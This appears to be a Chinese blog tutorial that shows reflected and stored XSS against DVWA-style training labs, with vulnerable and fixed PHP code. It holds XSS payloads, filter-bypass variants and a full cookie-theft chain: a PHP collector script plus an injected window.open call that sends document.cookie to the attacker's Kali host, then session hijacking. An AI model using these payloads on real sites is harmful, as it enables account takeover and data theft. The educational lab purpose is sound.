Eichi_

XSS详解（概念+靶场演示）反射型与存储型的比较与详细操作

XSS（跨站脚本攻击）

1.XSS简介

1.1什么是XSS?

1.2 XSS攻击的危害包括:

2. 分类

2.1反射型

2.2存储型

3. 构造XSS脚本

3.1常用HTML标签

3.2常用javascript方法

4.反射型（四种安全级别演示）

4.4.1低安全级别

4.4.2 中安全级别

4.4.2 高安全级别

4.4.2 不可能安全级别

5.存储型（四种安全级别演示）

5.1低安全级别

5.2 中安全级别

XSS（跨站脚本攻击）

项目实验环境

Metasploitable2-Linux 靶场

OWASP Broken Web Apps VM v1.2 靶场

Kali-Linux-2020.1-vmware-amd64 攻击机

1.XSS简介

跨站脚本( cross site script )为了避免与样式css(Cascading Style Sheets层叠样式表)混淆，所以简称为XSS。

XSS是一种经常出现在web应用中的计算机安全漏洞，也是web中最主流的攻击方式。

1.1什么是XSS?

XSS是指恶意攻击者利用网站没有对用户提交数据进行转义处理或者过滤不足的缺点，进而添加一些代码，嵌入到web页面中去。使别的用户访问都会执行相应的嵌入代码。

从而盗取用户资料、利用用户身份进行某种动作或者对访问者进行病毒侵害的一种攻击方式。

XSS主要原因:

过于信任客户端提交的数据!

1.2 XSS攻击的危害包括:

1、盗取各类用户帐号,如机器登录帐号、用户网银帐号，各类管理员帐号

2、控制企业数据，包括读取、篡改，添加、删除企业敏感数据的能力

3、盗窃企业重要的具有商业价值的资料

4、非法转账

5、强制发送电子邮件

6、网站挂马

7、控制受害者机器向其它网站发起攻击

2. 分类

2.1反射型

反射型xss攻击( Reflected XSS)又称为非持久性跨站点脚本攻击，它是最常见的类型的XSS。漏洞产生的原因是攻

击者注入的数据反映在响应中。一个典型的非持久性XSS包含一个带XSS攻击向量的链接( 即每次攻击需要用户的点击)。

2.2存储型

存储型XSS (Stored XSS)又称为持久型跨站点脚本，它一般发生在XSS攻击向量 (一般指XSS攻击代码)存储在网站数据库，当一个页面被用户打开的时候执行。每当用户打开浏览器，脚本执行。持久的XSS相比非持久性XSS攻击危害性更大，因为每当用户打开页面，查看内容时脚本将自动执行。谷歌的orkut 曾经就遭受到XSS。

两种类型实现的结果完全相同，不同的是前者需要点击，后者存在于网页的数据库内

3. 构造XSS脚本

3.1常用HTML标签

 创建包含另一个文档的内联框架


<textarea> 这个标签定义多行的文本输入控件


<img> 向网页中嵌入一副图像


<scirpt> 这个标签用于定义客户端脚本，比如JavaScript  这个标签既可以包含脚本语句，也可以通过src属性指向外部的脚本文件。必须的type属性规定脚本的MIME类型  JavaScript 的常见应用是图像操作、表单验证及动态内容更新。</code></pre> 
  <p>  </p> 
  <h4 id="3.2%E5%B8%B8%E7%94%A8javascript%E6%96%B9%E6%B3%95" style="margin-left:0cm;"><strong><span style="color:#333333;">3.2</span><span style="color:#333333;">常用</span><span style="color:#333333;">javascript</span><span style="color:#333333;">方法</span></strong></h4> 
  <pre><code class="language-perl">alert               alert()方法用于显示带有一条指定消息和一个确认按钮的警告框

window.location    window.location对象用于获得当前页面的地址(URL) ,并把浏览器重定向到新的页面

location.href   返回当前显示的文档的完整URL

onload                  一张页面或一幅图像完成加载

onsubmit              确认按钮被点击

onerror                 在加载文档或图像时发生错误</code></pre> 
  <p>  </p> 
  <p style="margin-left:0cm;"> </p> 
  <h3 id="4.%E5%8F%8D%E5%B0%84%E5%9E%8B%EF%BC%88%E5%9B%9B%E7%A7%8D%E5%AE%89%E5%85%A8%E7%BA%A7%E5%88%AB%E6%BC%94%E7%A4%BA%EF%BC%89" style="margin-left:0cm;"><strong>4.反射型（四种安全级别演示）</strong></h3> 
  <p style="margin-left:0cm;"> </p> 
  <h4 id="4.4.1%E4%BD%8E%E5%AE%89%E5%85%A8%E7%BA%A7%E5%88%AB" style="margin-left:0cm;"><strong><span style="color:#333333;">4.4.1</span><span style="color:#333333;">低安全级别</span></strong></h4> 
  <p style="margin-left:0cm;"><span style="color:#333333;">查看网页的后端代码，只要输入的字符不是空字符、</span><span style="color:#333333;">NULL</span><span style="color:#333333;">，那就直接打印</span><span style="color:#333333;">Hello</span><span style="color:#333333;">加输入的内容</span></p> 
  <pre><code class="language-php"><?php

// Is there any input?
if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) {
    // Feedback for end user
    echo '<pre>Hello ' . $_GET[ 'name' ] . '</pre>';
}

?>  </code></pre> 
  <p style="margin-left:0cm;">测试一下</p> 
  <p style="margin-left:0cm;"><a href="http://img.e-com-net.com/image/info8/1dcd31a522db4cf482c6fbbbc8f6a0b0.jpg" target="_blank"><img alt="XSS详解（概念+靶场演示）反射型与存储型的比较与详细操作_第2张图片" height="352" src="http://img.e-com-net.com/image/info8/1dcd31a522db4cf482c6fbbbc8f6a0b0.jpg" width="650" style="border:1px solid black;"></a></p> 
  <p style="margin-left:0cm;"> </p> 
  <p style="margin-left:0cm;">测试是否可以XSS攻击<strong><span style="color:#FF0000;">（注意这步及其关键，无论是反射型还是存储型都要先进性XSS的测试）</span></strong></p> 
  <p style="margin-left:0cm;">在输入框输入<script>alert('XSS')</script>，弹出窗口，可见存在XSS漏洞</p> 
  <p style="margin-left:0cm;"><a href="http://img.e-com-net.com/image/info8/e703ea09b17b4f87a40938b49a997e9f.jpg" target="_blank"><img alt="XSS详解（概念+靶场演示）反射型与存储型的比较与详细操作_第3张图片" height="230" src="http://img.e-com-net.com/image/info8/e703ea09b17b4f87a40938b49a997e9f.jpg" width="650" style="border:1px solid black;"></a></p> 
  <p style="margin-left:0cm;"> </p> 
  <p style="margin-left:0cm;">那么，接下来就肆意妄为的爆破吧，首先拿到此页面的cookie，这里注意一下，攻击者直接通过一些方式（社会工学）让受害者点击一个链接，这个链接就会拿到受害者在这个页面的cookie，下图拿到的cookie只是简单的测试一下XSS的漏洞威胁</p> 
  <p style="margin-left:0cm;">获取当前页面的cookie</p> 
  <pre><code class="language-perl"><script>alert(document.cookie)</script>

security=low;PHPSESSID=49acb6ca0a588a3176e77b602a36fce3</code></pre> 
  <p><a href="http://img.e-com-net.com/image/info8/8b98da08d0b6431f96c39a3f68422d17.jpg" target="_blank"><img alt="XSS详解（概念+靶场演示）反射型与存储型的比较与详细操作_第4张图片" height="231" src="http://img.e-com-net.com/image/info8/8b98da08d0b6431f96c39a3f68422d17.jpg" width="650" style="border:1px solid black;"></a></p> 
  <p style="margin-left:0cm;"> </p> 
  <p style="margin-left:0cm;">将拿到的这个cookie就可以以这个用户的名义去登录网页</p> 
  <p style="margin-left:0cm;">测试：</p> 
  <p style="margin-left:0cm;">换一个浏览器 使用获得的cookie去登录，可见无需用户名与密码，直接登录上来了</p> 
  <p style="margin-left:0cm;"><a href="http://img.e-com-net.com/image/info8/c7c3231f278b4f5198b1adb87a61c6d9.jpg" target="_blank"><img alt="XSS详解（概念+靶场演示）反射型与存储型的比较与详细操作_第5张图片" height="358" src="http://img.e-com-net.com/image/info8/c7c3231f278b4f5198b1adb87a61c6d9.jpg" width="650" style="border:1px solid black;"></a></p> 
  <p style="margin-left:0cm;"><a href="http://img.e-com-net.com/image/info8/c303d6168a5d442d80f5fa132aef772e.jpg" target="_blank"><img alt="XSS详解（概念+靶场演示）反射型与存储型的比较与详细操作_第6张图片" height="206" src="http://img.e-com-net.com/image/info8/c303d6168a5d442d80f5fa132aef772e.jpg" width="650" style="border:1px solid black;"></a></p> 
  <p style="margin-left:0cm;"> </p> 
  <h4 id="4.4.2%20%E4%B8%AD%E5%AE%89%E5%85%A8%E7%BA%A7%E5%88%AB" style="margin-left:0cm;"><strong>4.4.2 中安全级别</strong></h4> 
  <p style="margin-left:0cm;">这次先不去直接查看后端的代码，正常情况下是不能看到后端代码的（废话），这时候就要发挥想象力了，如果你觉得有些费力，且不妨看看我是怎么思考的</p> 
  <p style="margin-left:0cm;"> </p> 
  <p style="margin-left:0cm;">分析：</p> 
  <p style="margin-left:0cm;">首先，还是先测试一下这个网页有没有XSS漏洞，此时并没有弹窗，下面的输出是<script>中的内容，可以初步推断出来，后端可能把<script>给“过滤“了，再次测试，发现确实是这样</p> 
  <p style="margin-left:0cm;"><a href="http://img.e-com-net.com/image/info8/d78b82a30f1f47758666f5c6fb943e60.jpg" target="_blank"><img alt="XSS详解（概念+靶场演示）反射型与存储型的比较与详细操作_第7张图片" height="234" src="http://img.e-com-net.com/image/info8/d78b82a30f1f47758666f5c6fb943e60.jpg" width="650" style="border:1px solid black;"></a></p> 
  <p style="margin-left:0cm;"><a href="http://img.e-com-net.com/image/info8/5fc6f9129baa44aeb44aa73fb019f7ca.jpg" target="_blank"><img alt="XSS详解（概念+靶场演示）反射型与存储型的比较与详细操作_第8张图片" height="274" src="http://img.e-com-net.com/image/info8/5fc6f9129baa44aeb44aa73fb019f7ca.jpg" width="650" style="border:1px solid black;"></a></p> 
  <p style="margin-left:0cm;">解决：</p> 
  <p style="margin-left:0cm;">       在SQL注入中，对于被过滤的关键词可以采用以下这几种方法，这里相同</p> 
  <p style="margin-left:0cm;"> </p> 
  <ol> 
   <li>大小写</li> 
   <li>转义</li> 
   <li>内嵌</li> 
   <li>替换</li> 
  </ol> 
  <p style="margin-left:0cm;"> </p> 
  <p style="margin-left:0cm;">大小写，可见更改大小写后<script>中的内容被执行了</p> 
  <p style="margin-left:0cm;"><Script>alert('XSS')</Script></p> 
  <p style="margin-left:0cm;"><a href="http://img.e-com-net.com/image/info8/c375ea8dfe304b2b9ef79a703d478ae1.jpg" target="_blank"><img alt="XSS详解（概念+靶场演示）反射型与存储型的比较与详细操作_第9张图片" height="285" src="http://img.e-com-net.com/image/info8/c375ea8dfe304b2b9ef79a703d478ae1.jpg" width="650" style="border:1px solid black;"></a></p> 
  <p style="margin-left:0cm;"> </p> 
  <p style="margin-left:0cm;"> </p> 
  <p style="margin-left:0cm;">内嵌</p> 
  <p style="margin-left:0cm;"><sc<script>ript>alert('xss')</script></p> 
  <p style="margin-left:0cm;"><a href="http://img.e-com-net.com/image/info8/c25997c4c25f41f1aee8575906981030.jpg" target="_blank"><img alt="XSS详解（概念+靶场演示）反射型与存储型的比较与详细操作_第10张图片" height="228" src="http://img.e-com-net.com/image/info8/c25997c4c25f41f1aee8575906981030.jpg" width="650" style="border:1px solid black;"></a></p> 
  <p style="margin-left:0cm;"> </p> 
  <p style="margin-left:0cm;">替换，即使用其他标签来替换<script>标签</p> 
  <p style="margin-left:0cm;"><img src="#" οnerrοr=alert('XSS')></p> 
  <p style="margin-left:0cm;"><a href="http://img.e-com-net.com/image/info8/240ae8cd56dc41a8a2e4f34d9f2b8031.jpg" target="_blank"><img alt="XSS详解（概念+靶场演示）反射型与存储型的比较与详细操作_第11张图片" height="286" src="http://img.e-com-net.com/image/info8/240ae8cd56dc41a8a2e4f34d9f2b8031.jpg" width="650" style="border:1px solid black;"></a></p> 
  <p style="margin-left:0cm;"> </p> 
  <p style="margin-left:0cm;">现在来查看以下后台的代码，可以看到其确实是把<script>标签替换成了空字符</p> 
  <pre><code class="language-php"><?php

// Is there any input?
if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) {
    // Get input
    $name = str_replace( '<script>', '', $_GET[ 'name' ] );

    // Feedback for end user
    echo "<pre>Hello ${name}</pre>";
}

?></code></pre> 
  <p style="margin-left:0cm;"> </p> 
  <h4 id="4.4.2%20%E9%AB%98%E5%AE%89%E5%85%A8%E7%BA%A7%E5%88%AB" style="margin-left:0cm;"><strong>4.4.2 高安全级别</strong></h4> 
  <p style="margin-left:0cm;">来到高安全级别后，首先不要慌，他无非就是对某些字符做了一些更强的过滤而已，找对方法，还是可以实施攻击的，永远牢记，没有绝对的安全</p> 
  <p style="margin-left:0cm;">如下可见，对于大小写，内嵌都不能进行XSS的注入，但是替换标签就可以了，是不是很简单~</p> 
  <p style="margin-left:0cm;"><a href="http://img.e-com-net.com/image/info8/c66fc30b45f7489580614995ae8eec4c.jpg" target="_blank"><img alt="XSS详解（概念+靶场演示）反射型与存储型的比较与详细操作_第12张图片" height="283" src="http://img.e-com-net.com/image/info8/c66fc30b45f7489580614995ae8eec4c.jpg" width="650" style="border:1px solid black;"></a></p> 
  <p style="margin-left:0cm;"><a href="http://img.e-com-net.com/image/info8/7080fd7251614e2f94c306a20951f2c2.jpg" target="_blank"><img alt="XSS详解（概念+靶场演示）反射型与存储型的比较与详细操作_第13张图片" height="165" src="http://img.e-com-net.com/image/info8/7080fd7251614e2f94c306a20951f2c2.jpg" width="650" style="border:1px solid black;"></a></p> 
  <p style="margin-left:0cm;"><a href="http://img.e-com-net.com/image/info8/7505802a25004d2385593d7a6a73c31b.jpg" target="_blank"><img alt="XSS详解（概念+靶场演示）反射型与存储型的比较与详细操作_第14张图片" height="494" src="http://img.e-com-net.com/image/info8/7505802a25004d2385593d7a6a73c31b.jpg" width="650" style="border:1px solid black;"></a></p> 
  <p style="margin-left:0cm;"> </p> 
  <p style="margin-left:0cm;">此时，查看网页的后台代码，可见确实采用的是更强的字符过滤，但是对于替换他并没有设计，让我们看看impossibl难度下会不会对替换也做出过滤</p> 
  <pre><code class="language-php"><?php

// Is there any input?
if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) {
    // Get input
    $name = preg_replace( '/<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t/i', '', $_GET[ 'name' ] );

    // Feedback for end user
    echo "<pre>Hello ${name}</pre>";
}

?></code></pre> 
  <p style="margin-left:0cm;"> </p> 
  <h4 id="4.4.2%20%E4%B8%8D%E5%8F%AF%E8%83%BD%E5%AE%89%E5%85%A8%E7%BA%A7%E5%88%AB" style="margin-left:0cm;"><strong>4.4.2 不可能安全级别</strong></h4> 
  <p style="margin-left:0cm;">       到这里，不多bb，直接替换，可见，无论输入的是什么都被当做成了字符串输出了，并没有执行标签的内容</p> 
  <p style="margin-left:0cm;"><a href="http://img.e-com-net.com/image/info8/9a71b9198092426a99cf4f784873bc12.jpg" target="_blank"><img alt="XSS详解（概念+靶场演示）反射型与存储型的比较与详细操作_第15张图片" height="252" src="http://img.e-com-net.com/image/info8/9a71b9198092426a99cf4f784873bc12.jpg" width="650" style="border:1px solid black;"></a></p> 
  <p style="margin-left:0cm;"><a href="http://img.e-com-net.com/image/info8/27671a583da74c35be15c7c63ad96763.jpg" target="_blank"><img alt="XSS详解（概念+靶场演示）反射型与存储型的比较与详细操作_第16张图片" height="403" src="http://img.e-com-net.com/image/info8/27671a583da74c35be15c7c63ad96763.jpg" width="650" style="border:1px solid black;"></a></p> 
  <p style="margin-left:0cm;"> </p> 
  <p style="margin-left:0cm;">查看后台代码可以看出，使用了php htmlspecialchars()函数</p> 
  <p style="margin-left:0cm;">在php中，htmlspecialchars()函数是使用来把一些预定义的字符转换为HTML实体，返回转换后的新字符串，原字符串不变。如果 string 包含无效的编码，则返回一个空的字符串，除非设置了 ENT_IGNORE 或者 ENT_SUBSTITUTE 标志；</p> 
  <pre><code class="language-php"><?php

// Is there any input?
if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) {
    // Check Anti-CSRF token
    checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );

    // Get input
    $name = htmlspecialchars( $_GET[ 'name' ] );

    // Feedback for end user
    echo "<pre>Hello ${name}</pre>";
}

// Generate Anti-CSRF token
generateSessionToken();

?></code></pre> 
  <p style="margin-left:0cm;"> </p> 
  <p style="margin-left:0cm;"> </p> 
  <p style="margin-left:0cm;"><span style="color:#f33b45;"><strong>说明：XSS攻击的核心就是靠HTML<script>标签或元素属性来执行Javascript脚本。<br> 而 htmlspecialchars 则可以转转义 <> 这样就无法通过script标签攻击。同时又可以过滤掉双引号，单引号(需要另外加个参数)，阻止靠元素属性来触发事件执行脚本</strong></span></p> 
  <p style="margin-left:0cm;"> </p> 
  <pre><code class="language-perl">参数解释

$str = htmlspecialchars(string,flags,character-set,double_encode);

参数说明

string：规定要转换的字符串

flags ：可选参数，规定如何处理引号、无效的编码以及使用哪种文档类型

可用的引号类型：

ENT_COMPAT：默认。仅编码双引号。ENT_QUOTES：编码双引号和单引号。ENT_NOQUOTES：不编码任何引号。

无效的编码：

ENT_IGNORE：忽略无效的编码，而不是让函数返回一个空的字符串。应尽量避免，因为这可能对安全性有影响。

ENT_SUBSTITUTE： 把无效的编码替代成一个指定的带有 Unicode 替代字符 U+FFFD（UTF-8）或者 &#FFFD; 的字符，而不是返回一个空的字符串

ENT_DISALLOWED： 把指定文档类型中的无效代码点替代成 Unicode 替代字符 U+FFFD（UTF-8）或者 &#FFFD;。</code></pre> 
  <p>  </p> 
  <p style="margin-left:0cm;"> </p> 
  <h3 id="5.%E5%AD%98%E5%82%A8%E5%9E%8B%EF%BC%88%E5%9B%9B%E7%A7%8D%E5%AE%89%E5%85%A8%E7%BA%A7%E5%88%AB%E6%BC%94%E7%A4%BA%EF%BC%89" style="margin-left:0cm;"><strong>5.存储型（四种安全级别演示）</strong></h3> 
  <p style="margin-left:0cm;">以下采用靶场时OWASP 攻击机是Kali</p> 
  <p style="margin-left:0cm;">分析：</p> 
  <p style="margin-left:0cm;">       存储型的XSS漏洞威胁更大，即不需要用户做出点击链接的动作，直接写死在数据库内，当用户进入含有存储型XSS漏洞的页面时，根据攻击者制定的策略，来截获受害者的个人信息</p> 
  <h4 id="5.1%E4%BD%8E%E5%AE%89%E5%85%A8%E7%BA%A7%E5%88%AB" style="margin-left:0cm;"><strong>5.1低安全级别</strong></h4> 
  <p style="margin-left:0cm;">攻击者登录到这个页面后，在类似于留言板的地方，注入XSS攻击代码，这样所有的其他用户只要点击到这个位置就会执行XSS的代码</p> 
  <p style="margin-left:0cm;"> </p> 
  <p style="margin-left:0cm;"><a href="http://img.e-com-net.com/image/info8/7b6c10ce092c47c5a4663c8acfd4f9e8.jpg" target="_blank"><img alt="XSS详解（概念+靶场演示）反射型与存储型的比较与详细操作_第17张图片" height="239" src="http://img.e-com-net.com/image/info8/7b6c10ce092c47c5a4663c8acfd4f9e8.jpg" width="650" style="border:1px solid black;"></a></p> 
  <p style="margin-left:0cm;"> </p> 
  <p style="margin-left:0cm;"> </p> 
  <p style="margin-left:0cm;"> </p> 
  <p style="margin-left:0cm;">使用另一个浏览器登录user用户，一旦点击到XSS stored后，就会弹出窗口，这样的攻击方式，简单高效，不必通过一些社工诱导用户点击某个链接，而是直接中招</p> 
  <p style="margin-left:0cm;"><a href="http://img.e-com-net.com/image/info8/a6ceb1d9ef3e4efdbe09c3c96d6660f7.jpg" target="_blank"><img alt="XSS详解（概念+靶场演示）反射型与存储型的比较与详细操作_第18张图片" height="297" src="http://img.e-com-net.com/image/info8/a6ceb1d9ef3e4efdbe09c3c96d6660f7.jpg" width="650" style="border:1px solid black;"></a></p> 
  <p style="margin-left:0cm;"> </p> 
  <p style="margin-left:0cm;">下面将通过注入XSS漏洞获取受害主机的cookie，并将其发送到一个主机上（Kali）</p> 
  <p style="margin-left:0cm;">详细步骤：</p> 
  <p style="margin-left:0cm;"><span style="color:#333333;">1.</span><span style="color:#333333;">构建收集</span><span style="color:#333333;">cookie</span><span style="color:#333333;">服务器</span> <span style="color:#333333;">这里使用的是</span><span style="color:#333333;">KALI</span></p> 
  <p style="margin-left:0cm;"><span style="color:#333333;">2.</span><span style="color:#333333;">构造</span><span style="color:#333333;">XSS</span><span style="color:#333333;">代码并植入到</span><span style="color:#333333;">Web</span><span style="color:#333333;">服务器</span></p> 
  <p style="margin-left:0cm;"><span style="color:#333333;">3.</span><span style="color:#333333;">等待肉鸡触发</span><span style="color:#333333;">XSS</span><span style="color:#333333;">代码，其</span><span style="color:#333333;">cookie</span><span style="color:#333333;">就会被发送到</span><span style="color:#333333;">Kali</span></p> 
  <p style="margin-left:0cm;"><span style="color:#333333;">4.Cookie</span><span style="color:#333333;">利用</span> <span style="color:#333333;">根据</span><span style="color:#333333;">sqlmap</span><span style="color:#333333;">来爆库，表，数据等</span></p> 
  <p style="margin-left:0cm;"> </p> 
  <p style="margin-left:0cm;"> </p> 
  <p style="margin-left:0cm;">详细演示：</p> 
  <p style="margin-left:0cm;"><span style="color:#333333;">第一步：在</span><span style="color:#333333;"> KALI</span><span style="color:#333333;">打开</span><span style="color:#333333;"> http</span><span style="color:#333333;">服务，创建用于存放</span><span style="color:#333333;">cookie</span><span style="color:#333333;">的文件</span></p> 
  <pre><code class="language-perl">root@kali:~# systemctl start apache2

root@kali:~# vim   /var/www/html/cookie.php

<?php

       $cookie = $_GET['cookie'];

       $log = fopen("cookie.txt","w");

       fwrite($log,$cookie."\n");

       fclose($log);

?></code></pre> 
  <p>  </p> 
  <p style="margin-left:0cm;"><a href="http://img.e-com-net.com/image/info8/c66fc30b45f7489580614995ae8eec4c.jpg" target="_blank"><img alt="XSS详解（概念+靶场演示）反射型与存储型的比较与详细操作_第19张图片" height="283" src="http://img.e-com-net.com/image/info8/c66fc30b45f7489580614995ae8eec4c.jpg" width="650" style="border:1px solid black;"></a></p> 
  <p style="margin-left:0cm;">第二步：在页面内注入XSS的存储型漏洞</p> 
  <p style="margin-left:0cm;"><script>window.open('http://192.168.211.130/cookie.php?cookie='+document.cookie)</script></p> 
  <p style="margin-left:0cm;">注：192.168.211.130为kali的IP</p> 
  <p style="margin-left:0cm;">先清除之前植入的XSS代码</p> 
  <p style="margin-left:0cm;">这里由于前端的页面对输入框有字数限制，这里先改大一些</p> 
  <p style="margin-left:0cm;"> </p> 
  <p style="margin-left:0cm;"><a href="http://img.e-com-net.com/image/info8/7505802a25004d2385593d7a6a73c31b.jpg" target="_blank"><img alt="XSS详解（概念+靶场演示）反射型与存储型的比较与详细操作_第20张图片" height="494" src="http://img.e-com-net.com/image/info8/7505802a25004d2385593d7a6a73c31b.jpg" width="650" style="border:1px solid black;"></a></p> 
  <p style="margin-left:0cm;"> </p> 
  <p style="margin-left:0cm;">一旦注入，就会跳转至Kali的cookie.php页面用于收集用户的cookie值</p> 
  <p style="margin-left:0cm;"> </p> 
  <p style="margin-left:0cm;"><a href="http://img.e-com-net.com/image/info8/2edf5571d5ab4914a741366949d5c41a.jpg" target="_blank"><img alt="" height="63" src="http://img.e-com-net.com/image/info8/2edf5571d5ab4914a741366949d5c41a.jpg" width="650"></a></p> 
  <p style="margin-left:0cm;"> </p> 
  <p style="margin-left:0cm;"><span style="color:#333333;">第三步：肉鸡点击被植入了</span><span style="color:#333333;">XSS</span><span style="color:#333333;">代码的页面就将自己的</span><span style="color:#333333;">cookie</span><span style="color:#333333;">提交给了</span><span style="color:#333333;">KALI</span><span style="color:#333333;">，注意，对于弹出的窗口，要允许其弹出，要不然不会提交自己的</span><span style="color:#333333;">cookie</span></p> 
  <p style="margin-left:0cm;"><a href="http://img.e-com-net.com/image/info8/734035b3bf3f404dbd4cd2783d098688.jpg" target="_blank"><img alt="XSS详解（概念+靶场演示）反射型与存储型的比较与详细操作_第21张图片" height="389" src="http://img.e-com-net.com/image/info8/734035b3bf3f404dbd4cd2783d098688.jpg" width="650" style="border:1px solid black;"></a></p> 
  <p style="margin-left:0cm;"><span style="color:#333333;">一旦允许，就会将自己的</span><span style="color:#333333;">cookie</span><span style="color:#333333;">上传给</span><span style="color:#333333;">Kali</span><span style="color:#333333;">的</span><span style="color:#333333;">/var/www/html/cookie.txt</span><span style="color:#333333;">内</span></p> 
  <p style="margin-left:0cm;"><a href="http://img.e-com-net.com/image/info8/1b86bef542f04ecba36353108e7f723d.jpg" target="_blank"><img alt="" height="84" src="http://img.e-com-net.com/image/info8/1b86bef542f04ecba36353108e7f723d.jpg" width="650"></a></p> 
  <p style="margin-left:0cm;"> </p> 
  <p style="margin-left:0cm;"><span style="color:#333333;">此时</span> <span style="color:#333333;">，</span><span style="color:#333333;">KALI</span><span style="color:#333333;">就会生成一个存储</span><span style="color:#333333;">cookie</span><span style="color:#333333;">的文件</span>，其内容存储的就是<span style="color:#333333;">user</span><span style="color:#333333;">用户的本地</span><span style="color:#333333;">cookie</span></p> 
  <p style="margin-left:0cm;"><a href="http://img.e-com-net.com/image/info8/64e70447d3184a66ac122586934ce44c.png" target="_blank"><img alt="XSS详解（概念+靶场演示）反射型与存储型的比较与详细操作_第22张图片" height="188" src="http://img.e-com-net.com/image/info8/64e70447d3184a66ac122586934ce44c.png" width="834" style="border:1px solid black;"></a></p> 
  <p style="margin-left:0cm;">验证，可见与Kali获取的cookie是一致的</p> 
  <p style="margin-left:0cm;"><a href="http://img.e-com-net.com/image/info8/ec57929299a94f6193b1b01871255d0f.jpg" target="_blank"><img alt="XSS详解（概念+靶场演示）反射型与存储型的比较与详细操作_第23张图片" height="293" src="http://img.e-com-net.com/image/info8/ec57929299a94f6193b1b01871255d0f.jpg" width="650" style="border:1px solid black;"></a></p> 
  <p style="margin-left:0cm;">然后呢，你都拿到cookie了，接下来就肆意妄为吧</p> 
  <p style="margin-left:0cm;"> </p> 
  <p style="margin-left:0cm;">查看低安全级别的后台代码</p> 
  <pre><code class="language-php"><?php

if(isset($_POST['btnSign']))
{

   $message = trim($_POST['mtxMessage']);
   $name    = trim($_POST['txtName']);
   
   // Sanitize message input
   $message = stripslashes($message);
   $message = mysql_real_escape_string($message);
   
   // Sanitize name input
   $name = mysql_real_escape_string($name);
  
   $query = "INSERT INTO guestbook (comment,name) VALUES ('$message','$name');";
   
   $result = mysql_query($query) or die('<pre>' . mysql_error() . '</pre>' );
    }
?></code></pre> 
  <p style="margin-left:0cm;"> </p> 
  <p style="margin-left:0cm;">可见，使用POST提交了name与message，然后对dvwa库的guesbook表进行插入数据，从这里可以看出，确实是写死在了数据库中，更能理解XSS的存储型漏洞的详细了。在这个安全级别下无任何的防御措施，任人注入漏别</p> 
  <p style="margin-left:0cm;"> </p> 
  <p style="margin-left:0cm;">登录到后台的数据库中验证，可见，与预期相符</p> 
  <p style="margin-left:0cm;"><a href="http://img.e-com-net.com/image/info8/7dc536af2a0b49d5a89c019486f64719.jpg" target="_blank"><img alt="XSS详解（概念+靶场演示）反射型与存储型的比较与详细操作_第24张图片" height="294" src="http://img.e-com-net.com/image/info8/7dc536af2a0b49d5a89c019486f64719.jpg" width="650" style="border:1px solid black;"></a></p> 
  <h4 id="5.2%20%E4%B8%AD%E5%AE%89%E5%85%A8%E7%BA%A7%E5%88%AB" style="margin-left:0cm;"><strong>5.2 中安全级别</strong></h4> 
  <p style="margin-left:0cm;">直接使用最简单的弹窗类进行测试，可见其是将<script>标签给过滤了，解决办法与XSS的反射型的安全级别一致，大小写或替换，或内嵌都是可以的</p> 
  <p style="margin-left:0cm;"><a href="http://img.e-com-net.com/image/info8/27671a583da74c35be15c7c63ad96763.jpg" target="_blank"><img alt="XSS详解（概念+靶场演示）反射型与存储型的比较与详细操作_第25张图片" height="403" src="http://img.e-com-net.com/image/info8/27671a583da74c35be15c7c63ad96763.jpg" width="650" style="border:1px solid black;"></a></p> 
  <p style="margin-left:0cm;"> </p> 
  <p style="margin-left:0cm;">测试发现，大小写，内嵌、替换都没有用，其实后台是将<>给转义了，这样无论使用<script>还是<img>标签都没有用</p> 
  <p style="margin-left:0cm;"><a href="http://img.e-com-net.com/image/info8/c22d9fcfde984e1896c2da966b184082.jpg" target="_blank"><img alt="XSS详解（概念+靶场演示）反射型与存储型的比较与详细操作_第26张图片" height="331" src="http://img.e-com-net.com/image/info8/c22d9fcfde984e1896c2da966b184082.jpg" width="650" style="border:1px solid black;"></a></p> 
  <p style="margin-left:0cm;"><a href="http://img.e-com-net.com/image/info8/c2bfc8107bf6425092d25ca7f3277e89.jpg" target="_blank"><img alt="XSS详解（概念+靶场演示）反射型与存储型的比较与详细操作_第27张图片" height="401" src="http://img.e-com-net.com/image/info8/c2bfc8107bf6425092d25ca7f3277e89.jpg" width="650" style="border:1px solid black;"></a></p> 
  <p style="margin-left:0cm;"> </p> 
  <p style="margin-left:0cm;">查看页面后台代码</p> 
  <pre><code class="language-php"><?php

if(isset($_POST['btnSign']))
{
   $message = trim($_POST['mtxMessage']);
   $name    = trim($_POST['txtName']);
   
   // Sanitize message input
   $message = trim(strip_tags(addslashes($message)));
   $message = mysql_real_escape_string($message);
   $message = htmlspecialchars($message);
   // Sanitize name input
   $name = str_replace('<script>', '', $name);
   $name = mysql_real_escape_string($name);
  
   $query = "INSERT INTO guestbook (comment,name) VALUES ('$message','$name');";
   
   $result = mysql_query($query) or die('<pre>' . mysql_error() . '</pre>' );
   
}

?></code></pre> 
  <p style="margin-left:0cm;"> </p> 
  <p style="margin-left:0cm;">查看页面的后台数据库，可见确实是对<>做了转换</p> 
  <p style="margin-left:0cm;"><a href="http://img.e-com-net.com/image/info8/384e20ae58334dc4aeb580a34e957cd5.jpg" target="_blank"><img alt="XSS详解（概念+靶场演示）反射型与存储型的比较与详细操作_第28张图片" height="567" src="http://img.e-com-net.com/image/info8/384e20ae58334dc4aeb580a34e957cd5.jpg" width="589" style="border:1px solid black;"></a></p> 
  <p style="margin-left:0cm;"> </p> 
  <hr> 
  <p> </p> 
 </div> 
</div>
                            </div>
                        </div>
                    </div>
                    <!--PC和WAP自适应版-->
                    <div id="SOHUCS" sid="1755809133967196160"></div>
                    <script type="text/javascript" src="/views/front/js/chanyan.js"></script>
                    <!-- 文章页-底部 动态广告位 -->
                    <div class="youdao-fixed-ad" id="detail_ad_bottom"></div>
                </div>
                <div class="col-md-3">
                    <div class="row" id="ad">
                        <!-- 文章页-右侧1 动态广告位 -->
                        <div id="right-1" class="col-lg-12 col-md-12 col-sm-4 col-xs-4 ad">
                            <div class="youdao-fixed-ad" id="detail_ad_1"> </div>
                        </div>
                        <!-- 文章页-右侧2 动态广告位 -->
                        <div id="right-2" class="col-lg-12 col-md-12 col-sm-4 col-xs-4 ad">
                            <div class="youdao-fixed-ad" id="detail_ad_2"></div>
                        </div>
                        <!-- 文章页-右侧3 动态广告位 -->
